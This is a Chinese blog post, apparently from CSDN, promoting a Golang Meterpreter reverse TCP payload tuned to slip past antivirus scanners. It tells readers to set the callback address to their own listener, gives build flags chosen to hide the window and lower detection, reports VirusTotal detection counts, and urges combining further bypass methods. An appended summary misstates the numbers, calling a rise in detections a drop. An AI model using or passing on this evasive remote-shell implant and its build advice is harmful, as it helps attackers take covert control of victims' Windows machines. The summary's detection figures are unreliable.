Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter
做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
使用方法
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386
go build -ldflags="-H windowsgui -w"
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
免杀效果
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
VT检测结果地址:

这篇博客介绍了如何使用Golang编写一个x86架构的Meterpreter reverse tcppayload,并进行了静态免杀优化。作者修改了EGESPLOIT项目代码以减小编译后程序的大小,目前约为1.2MB。通过调整go_meterpreter.go中的IP和端口,用户可以自行编译。文章还提及了免杀效果,编译后的程序在 VirusTotal 上的查杀率从最初的8/62降低到20/70,但Windows 10内置杀毒软件仍可能通过动态行为检测拦截该程序。
最低0.47元/天 解锁文章
1062

被折叠的 条评论
为什么被折叠?



